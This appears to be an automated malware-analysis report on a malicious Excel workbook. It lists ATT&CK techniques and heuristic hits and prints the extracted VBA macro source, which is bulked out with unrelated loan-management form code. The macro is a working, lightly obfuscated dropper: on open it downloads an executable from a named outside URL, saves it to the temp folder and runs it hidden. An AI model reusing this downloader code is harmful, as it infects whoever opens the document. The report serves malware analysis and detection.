Verdict: MALICIOUS
Risk Score: 438

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1059 Command and Scripting Interpreter
The sample is an Excel document containing VBA macros. The Workbook_Open macro is triggered upon opening, which constructs a URL to download a file and then executes it using WScript.Shell. The document body explicitly instructs the user to 'enable content' to view the document, acting as a lure. The VBA script reconstructs the download URL as 'http://1stchoicepestcontrol.co.za/image.exe' and saves the payload to a temporary path as 'exe.by98j'.
Heuristics (11)

- ClamAV: Doc.Dropper.Agent-6412232-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6412232-1
- VBA project inside OOXML (medium, OOXML_VBA, 7 related findings): Document contains a VBA project — VBA macros present
- WScript.Shell usage (critical, OLE_VBA_WSCRIPT). Matched line in script: `Set w = CreateObject("WScript.Shell")`
- Obfuscated VBA Shell command with URL (critical, OLE_VBA_OBFUSCATED_SHELL_URL): VBA macro invokes Shell with command text assembled through decoder or string-manipulation functions and includes a URL. This is a high-confidence downloader/dropper pattern, stronger than Shell or URL evidence on their own. Matched line in script: `Set w = CreateObject("WScript.Shell")`
- VBA downloads and writes a file to disk (critical, OLE_VBA_HTTP_DROP_EXEC): VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning. Matched line in script: `.Write r.ResponseBody`
- CreateObject call (high, OLE_VBA_CREATEOBJ). Matched line in script: `Set w = CreateObject("WScript.Shell")`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Workbook_Open macro (low, OLE_VBA_WBOPEN). Matched line in script: `Public Sub Workbook_Open()`
- Environ() call (env variable access) (low, OLE_VBA_ENVIRON). Matched line in script: `se = Environ$(Chr(116) & Chr(101) & Chr(109) & Chr(112)) & "\" & StrReverse("exe.by98j")`
- Macro/content-enable lure (medium, SE_ENABLE_LURE): Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://1stchoicepestcontrol.co.za/image.exe (referenced by macro)
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 16450 bytes | 99f8b179f73ae111431c8ec811b94f9ea4cf5f151ded0057c4474a426314ed26 |

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Public Sub Workbook_Open()
d0rfavlqmrk
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "qhm12orluum"
Sub d0rfavlqmrk()
Dim s As String
l = "http://1stchoicepestcontrol.co.za/image.exe"
On Error Resume Next
se = Environ$(Chr(116) & Chr(101) & Chr(109) & Chr(112)) & "\" & StrReverse("exe.by98j")
minus l, se
sdfeerrff se, ""
End
End Sub
Sub sdfeerrff(p, j)
On Error Resume Next
Set w = CreateObject("WScript.Shell")
w.Run p & " " & j & " ", INVISIBLE, NOWAIT
End Sub
Sub minus(u, f)
On Error Resume Next
Dim ob2dua5uope As Integer
Dim AA14kaks04vhr As Integer
Dim u3tut2sh5ta As Integer
Dim qebkzzladvb As Integer
Dim pch1gp2p025 As Integer
Dim sru2gzci0on As Integer
Dim AA3qfa0p0sser As Integer
Dim AA1t1gzn5kqsu As Integer
Dim zwaulqjotbo As Integer
Dim fnmg405sk13 As Integer
Dim rlcsqwrjkeh As Integer
Dim iburpnfsf1w As Integer
Dim mma3fskvkvl As Integer
Dim x0kv5fxf3qy As Integer
Dim gjaet22ap2g As Integer
Dim jsg2agy31y1 As Integer
Dim zs4qmtlizao As Integer
Dim dygp42hfkb4 As Integer
Dim u5o5ta41dmn As Integer
Dim n4ou4co5jrj As Integer
Set r = CreateObject("WinHttp.WinHttpRequest.5.1")
r.Open "GET", u, False
r.Send
Dim pcu7tc3uv8l8bgcl0jlqllembipr36ifzucfs9wv775f949mej As Integer
Dim aducqxipu5flk4dg5hd4iixslzog8p76l72z8f8wj9h7geitjf As Integer
Dim zxz563wjfyiaqihjpsc4vwamebizpdhvt3uqezbxjqqzj0qhyr As Integer
Dim a2r8nz6hlum7lxam2eq2ygfmams69j1p2rkr1upchwbmk2zonf As Long
Dim jthbyjh5idr2rt1r7v8bftmm617ow54tdcj4tcx9rr4hyqyyky As Integer
pcu7tc3uv8l8bgcl0jlqllembipr36ifzucfs9wv775f949mej = "b9hk3rworqvbit1w66ky2iloq2eg6s9rvxbdouxperze4ikd8g353"
aducqxipu5flk4dg5hd4iixslzog8p76l72z8f8wj9h7geitjf = "gkdhrltvqivm32wvcb3mrfo6d7x6a2xp9hsqji6o3cu0jiwr923148"
zxz563wjfyiaqihjpsc4vwamebizpdhvt3uqezbxjqqzj0qhyr = 1259
a2r8nz6hlum7lxam2eq2ygfmams69j1p2rkr1upchwbmk2zonf = 837
For jthbyjh5idr2rt1r7v8bftmm617ow54tdcj4tcx9rr4hyqyyky = 0 To 5
pcu7tc3uv8l8bgcl0jlqllembipr36ifzucfs9wv775f949mej = "a6wqfhp552gynsfhwndl88m8h6l8yjbipmgdsp0wjh441b5nr45520"
aducqxipu5flk4dg5hd4iixslzog8p76l72z8f8wj9h7geitjf = "aniunjxmasv1ua2wclxs4abkb0rivhksa2ysy7e8qv0yqiqj8t3146"
zxz563wjfyiaqihjpsc4vwamebizpdhvt3uqezbxjqqzj0qhyr = 1841
a2r8nz6hlum7lxam2eq2ygfmams69j1p2rkr1upchwbmk2zonf = 1745
Next jthbyjh5idr2rt1r7v8bftmm617ow54tdcj4tcx9rr4hyqyyky
Set fs = CreateObject("Scripting.FileSystemObject")
If fs.FileExists(f) Then
pcu7tc3uv8l8bgcl0jlqllembipr36ifzucfs9wv775f949mej = "b9hk3rworqvbit1w66ky2iloq2eg6s9rvxbdouxperze4ikd8g353"
aducqxipu5flk4dg5hd4iixslzog8p76l72z8f8wj9h7geitjf = "gkdhrltvqivm32wvcb3mrfo6d7x6a2xp9hsqji6o3cu0jiwr923148"
zxz563wjfyiaqihjpsc4vwamebizpdhvt3uqezbxjqqzj0qhyr = 1259
fs.DeleteFile (f)
End If
aducqxipu5flk4dg5hd4iixslzog8p76l72z8f8wj9h7geitjf = "aniunjxmasv1ua2wclxs4abkb0rivhksa2ysy7e8qv0yqiqj8t3146"
zxz563wjfyiaqihjpsc4vwamebizpdhvt3uqezbxjqqzj0qhyr = 1841
a2r8nz6hlum7lxam2eq2ygfmams69j1p2rkr1upchwbmk2zonf = 1745
'Next jthbyjh5idr2rt1r7v8bftmm617ow54tdcj4tcx9rr4hyqyyky
If r.Status = 200 Then
Set st = CreateObject("ADODB.Stream")
pcu7tc3uv8l8bgcl0jlqllembipr36ifzucfs9wv775f949mej = "b9hk3rworqvbit1w66ky2iloq2eg6s9rvxbdouxperze4ikd8g353"
aducqxipu5flk4dg5hd4iixslzog8p76l72z8f8wj9h7geitjf = "gkdhrltvqivm32wvcb3mrfo6d7x6a2xp9hsqji6o3cu0jiwr923148"
zxz563wjfyiaqihjpsc4vwamebizpdhvt3uqezbxjqqzj0qhyr = 1259
pcu7tc3uv8l8bgcl0jlqllembipr36ifzucfs9wv775f949mej = "b9hk3rworqvbit1w66ky2iloq2eg6s9rvxbdouxperze4ikd8g353"
aducqxipu5flk4dg5hd4iixslzog8p76l72z8f8wj9h7geitjf = "gkdhrltvqivm32wvcb3mrfo6d7x6a2xp9hsqji6o3cu0jiwr923148"
zxz563wjfyiaqihjpsc4vwamebizpdhvt3uqezbxjqqzj0qhyr = 1259
With st
.Type = 1
.Open
.Write r.ResponseBody
.SaveToFile f
.Close
End With
Set st = Nothing
End If
End Sub
Private Sub Command2_Click()
ID = txtid.Text
OpenConn
sql = "SELECT * FROM LoanManagement WHERE clng(ID)='" & ID & "'"
Set rsupdate = New ADODB.Recordset
rsupdate.Open sql, con, adOpenStatic, adLockOptimistic
If Not rsupdate.EOF Then
With rsupdate
!Amountpaid = txtNewAmount.Text
!Datepaid = txtNewDate.Text
!Amountremaining = txtAmontRemaining.Text
.Update
End With
MsgBox "Record successfully updated..", vbInformation, "Success"
fillgrid
txtid.Text = ""
txtAccName.Text = ""
txtAccNo.Text = ""
txtLoanAmount.Text = ""
txtMonthlyRepayment.Text = ""
txtRepayAmount.Text = ""
txtLoanofficer.Text = ""
txtDateIsued.Text = ""
txtDatedue.Text = ""
txtAmountPaid.Text = ""
txtDatePaid.Text = ""
txtAmountRemaining.Text = ""
txtCollateral.Text = ""
End If
End Sub
Private Sub Form_Load()
Call Connect
fillgrid
End Sub
Public Function fillgrid()
Dim c As Integer
Dim r As Integer
Call Connect
Dim sql As String
rsusergrid.CursorLocation = adUseClient
'---Sql command
sql = "select * from LoanManagement"
rsusergrid.Open sql, con, adOpenKeyset, adLockOptimistic
With FlexMember
FlexMember.Cols = rsusergrid.Fields.Count + 1
FlexMember.ColWidth(0) = 0
For c = 0 To rsusergrid.Fields.Count - 1
FlexMember.TextMatrix(0, c + 1) = rsusergrid(c).Name
Next
FlexMember.Rows = rsusergrid.RecordCount + 1
For r = 1 To rsusergrid.RecordCount
For c = 0 To rsusergrid.Fields.Count - 1
FlexMember.TextMatrix(r, c + 1) = IIf(IsNull(rsusergrid(c).Value), "{Null}", rsusergrid(c).Value)
Next c
rsusergrid.MoveNext
Next r
End With
End Function
'CODES FOR DISPLAYING DATA IN TEXT BOXES AND IMAGE CONTROL
Private Sub FlexMember_Click()
'---first clear textboxes and image control
On Error Resume Next
txtid.Text = ""
txtAccName.Text = ""
txtAccNo.Text = ""
'txtAddress.Text = ""
txtLoanAmount.Text = ""
'txtInterest.Text = ""
'cmbLoanPeriod.Text = ""
txtMonthlyRepayment.Text = ""
txtRepayAmount.Text = ""
'txtBankBranch.Text = ""
'txtIssueDate.Text = ""
'txtOccupation.Text = ""
'txtPhoneno.Text = ""
'cmbLoantype.Text = ""
txtLoanofficer.Text = ""
txtDateIsued.Text = ""
txtDatedue.Text = ""
txtAmountPaid = ""
txtDatePaid = ""
txtAmountRemaining = ""
txtCollateral = ""
'----then connect to database by calling that function i.e connect
Call Connect
'---then write sql command to fetch data from database
rsusergrid.Open "select * from LoanManagement", con, adOpenDynamic, adLockOptimistic
rsusergrid.MoveFirst
'---this fill the datagrid view with row from database,arranged by column number
rsusergrid.Move FlexMember.Row - 1
txtid.Text = FlexMember.TextMatrix(FlexMember.Row, 1)
txtAccName.Text = FlexMember.TextMatrix(FlexMember.Row, 2)
txtAccNo.Text = FlexMember.TextMatrix(FlexMember.Row, 3)
'txtAddress.Text = FlexMember.TextMatrix(FlexMember.Row, 4)
txtLoanAmount.Text = FlexMember.TextMatrix(FlexMember.Row, 5)
'txtInterest.Text = FlexMember.TextMatrix(FlexMember.Row, 6)
'cmbLoanPeriod.Text = FlexMember.TextMatrix(FlexMember.Row, 7)
txtMonthlyRepayment.Text = FlexMember.TextMatrix(FlexMember.Row, 8)
txtRepayAmount.Text = FlexMember.TextMatrix(FlexMember.Row, 9)
'txtBankBranch.Text = FlexMember.TextMatrix(FlexMember.Row, 10)
'txtIssueDate.Text = FlexMember.TextMatrix(FlexMember.Row, 11)
'txtOccupation.Text = FlexMember.TextMatrix(FlexMember.Row, 12)
'txtPhoneno.Text = FlexMember.TextMatrix(FlexMember.Row, 13)
'cmbLoantype.Text = FlexMember.TextMatrix(FlexMember.Row, 14)
txtLoanofficer.Text = FlexMember.TextMatrix(FlexMember.Row, 15)
txtDateIsued.Text = FlexMember.TextMatrix(FlexMember.Row, 16)
txtDatedue.Text = FlexMember.TextMatrix(FlexMember.Row, 17)
txtAmountPaid = FlexMember.TextMatrix(FlexMember.Row, 18)
txtDatePaid = FlexMember.TextMatrix(FlexMember.Row, 19)
txtAmountRemaining = FlexMember.TextMatrix(FlexMember.Row, 20)
txtCollateral = FlexMember.TextMatrix(FlexMember.Row, 21)
End Sub
Private Sub cmdRefresh_Click()
Unload Me
End Sub
Private Sub Form_Loads()
'WHEN FORM LOAD THE FOLLOWING CODES WILL BE EXECUTED FIRST
'CODES FOR INCREMENT USER ID NUMBER IN ID TEXT BOX i.e +1
On Error Resume Next
Call Connect
con.Refresh
With rsfind
.Open "select * from LoanManagement", con, adOpenDynamic, adLockPessimistic
.MoveLast
If IsNull(.Fields("ID").Value) Then
txtid.Text = 1
Else
no = .Fields("ID") + 1
txtid.Text = no
End If
.Close
End With
Call Connect
For t = 1 To 20
cmbLoanPeriod.AddItem t
Next t
cmdSave.Enabled = False
HidePayments
End Sub
Private Sub cmdPayment_Click()
On Error Resume Next
'This section Computes the Loan Repayment
'First, it makes sure all data are supplied
'It then substitute the Data to the formular: (P*R*T)/100
'Results obtained are Displayed on the output textboxes
'it then Disable the Payment Command, allowing the User Save Command to come up
If txtAccName = "" Then
MsgBox "Enter Name", vbInformation
Exit Sub
End If
If txtAccNo.Text = "" Then
MsgBox "Enter Account Number", vbInformation
Exit Sub
End If
If txtAddress = "" Then
MsgBox "Enter Address", vbInformation
Exit Sub
End If
If txtBankBranch = "" Then
MsgBox "Enter Bank Branch", vbInformation
Exit Sub
End If
If txtIssueDate = "" Then
MsgBox "Enter Issue Date", vbInformation
Exit Sub
End If
If txtOccupation = "" Then
MsgBox "Enter Occupation", vbInformation
Exit Sub
End If
If txtPhoneno = "" Then
MsgBox "Enter Phone Number", vbInformation
Exit Sub
End If
If txtLoanAmount.Text = "" Then
MsgBox "Enter Loan Amount", vbInformation
Exit Sub
End If
If txtInterest.Text = "" Then
MsgBox "Set Interest", vbInformation
Exit Sub
End If
If cmbLoanPeriod.Text = "" Then
MsgBox "Enter Loan Period", vbInformation
Exit Sub
End If
If txtCollateral.Text = "" Then
MsgBox "Enter Collateral", vbInformation
Exit Sub
End If
ShowPayments
Dim Repay As Double
Dim repayment As Double
Repay = (txtLoanAmount.Text * txtInterest.Text * cmbLoanPeriod.Text) / 100
repayment = Format(Repay + txtLoanAmount, "##,##0.00")
If optYears.Value = True Then
txtMonthlyRepayment.Text = (repayment) / (cmbLoanPeriod * 12)
End If
If optMonths.Value = True Then
txtMonthlyRepayment.Text = (repayment / cmbLoanPeriod)
End If
txtRepayAmount.Text = repayment
cmdPayment.Enabled = False
cmdSave.Enabled = True
cmdSave.SetFocus
End Sub
Private Sub cmdSave_Click()
If txtLoanofficer.Text = "" Then
MsgBox "Enter Name of Loan Officer", vbInformation
Exit Sub
End If
If txtDateIsued.Text = "" Then
MsgBox "Enter Date Issued", vbInformation
Exit Sub
End If
If txtDatedue.Text = "" Then
MsgBox "Enter Date due", vbInformation
Exit Sub
End If
Call Connect
With rsuser
.AddNew
.Fields("ID") = frmAdd.txtid.Text
.Fields("Accountname") = frmAdd.txtAccName.Text
.Fields("Accountnumber") = frmAdd.txtAccNo.Text
.Fields("Address") = frmAdd.txtAddress.Text
.Fields("Amountofloan") = frmAdd.txtLoanAmount.Text
.Fields("interestcharged") = frmAdd.txtInterest.Text
.Fields("Periodofloan") = frmAdd.cmbLoanPeriod.Text
.Fields("Monthlyrepayment") = frmAdd.txtMonthlyRepayment.Text
.Fields("Totalrepayment") = frmAdd.txtRepayAmount.Text
.Fields("Bankbranch") = frmAdd.txtBankBranch.Text
.Fields("Issuedate") = frmAdd.txtIssueDate.Text
.Fields("Occupation") = frmAdd.txtOccupation.Text
.Fields("Phoneno") = frmAdd.txtPhoneno.Text
.Fields("Typeofloan") = frmAdd.cmbLoantype.Text
.Fields("Loanofficer") = frmAdd.txtLoanofficer.Text
.Fields("Dateissued") = frmAdd.txtDateIsued.Text
.Fields("Datedue") = frmAdd.txtDatedue.Text
.Fields("Amountremaining") = frmAdd.txtRepayAmount.Text
.Fields("Collateral") = frmAdd.txtCollateral.Text
.Update
.Close
con.Close
End With
'*********************************************************************
'MESSAGE BOX CODES ASSOCIATED WITH ADD EVENT
MsgBox "Information Successfully Added, Please Proceed", vbInformation, "INFORMATION"
Dim rep
rep = MsgBox("Do you wish to add new information ?", vbInformation + vbYesNo, "Add New Record")
If rep = vbYes Then
Load frmAdd
Load Me
frmAdd.Show
Else
Unload Me
frmMain.Show
End If
'***************************************************************
'CODES FOR INCREMENT USER ID NUMBER IN ID TEXT BOX i.e +1
On Error Resume Next
Call Connect
con.Refresh
With rsfind
.Open "select * from LoanManagement", con, adOpenDynamic, adLockPessimistic
.MoveLast
If IsNull(.Fields("ID").Value) Then
txtid.Text = 1
Else
no = .Fields("ID") + 1
txtid.Text = no
End If
.Close
End With
'**************************************
'NO ID SHOULD FOLLOW
txtAccName.Text = ""
txtAccNo.Text = ""
txtAddress.Text = ""
txtLoanAmount.Text = ""
txtInterest.Text = ""
cmbLoanPeriod.Text = ""
txtMonthlyRepayment.Text = ""
txtRepayAmount.Text = ""
txtBankBranch.Text = ""
txtIssueDate.Text = ""
txtOccupation.Text = ""
txtPhoneno.Text = ""
cmbLoantype.Text = ""
txtLoanofficer.Text = ""
txtDateIsued.Text = ""
txtDatedue.Text = ""
End Sub
Private Sub optMonths_Click()
'List 12 months only
'cmbLoanPeriod.Clear
For t = 1 To 12
cmbLoanPeriod.AddItem t
Next t
If txtMonthlyRepayment.Text <> "" Then
cmdPayment_Click
End If
End Sub
Private Sub optYears_Click()
'List up to 20 years
'cmbLoanPeriod.Clear
For t = 1 To 20
cmbLoanPeriod.AddItem t
Next t
If txtMonthlyRepayment.Text <> "" Then
cmdPayment_Click
End If
End Sub
Private Sub txtLoanAmount_LostFocus()
txtLoanAmount.Text = Format(txtLoanAmount.Text, "##,##0")
End Sub
Private Sub txtMonthlyRepayment_LostFocus()
txtMonthlyRepayment.Text = Format(txtMonthlyRepayment.Text, "0.00")
End Sub
Private Sub updInterest_Change()
txtInterest.Text = Str(updInterest.Value) '& " %"
End Sub
Sub ShowPayments()
txtMonthlyRepayment.Visible = True
txtRepayAmount.Visible = True
Label1(9).Visible = True
Label1(5).Visible = True
End Sub
Sub HidePayments()
txtMonthlyRepayment.Visible = False
txtRepayAmount.Visible = False
Label1(9).Visible = False
Label1(5).Visible = False
End Sub

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 43008 bytes | 2bb0b0be1abf6694345889085a0bd4556761a9e2939c9bceca47fb93810e9fea |

Detection
- ClamAV: Doc.Dropper.Agent-6412232-1
- Obfuscation or payload: unlikely